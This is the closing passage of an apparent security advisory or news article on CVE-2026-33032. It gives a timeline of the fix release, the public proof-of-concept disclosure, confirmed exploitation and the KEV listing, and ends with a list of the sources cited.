| 2026-03-15 | v2.3.4 released publicly with the fix; same day Pluto Security published initial technical details |
| 2026-03-28 | CVE-2026-33032 published in the NVD; full PoC exploit and technical details released publicly |
| 2026-03 | Active exploitation in the wild confirmed (per Recorded Future Insikt Group March 2026 CVE Landscape report) |
| 2026-04-13 | VulnCheck adds CVE-2026-33032 to its Known Exploited Vulnerabilities (KEV) list; Recorded Future assigns risk score 94/100 |
Sources and References
Technical details in this article are drawn from original security research and verified sources.
- Pluto Security -- Original CVE-2026-33032 research and MCPwn exploit chain documentation
- BleepingComputer -- Active exploitation confirmation and PoC disclosure timeline
- Infosecurity Magazine -- Shodan exposure data and Docker pull count analysis
- The Hacker News -- Full two-CVE chain analysis and mitigation guidance
- NIST NVD -- CVE-2026-33032 -- Official vulnerability database entry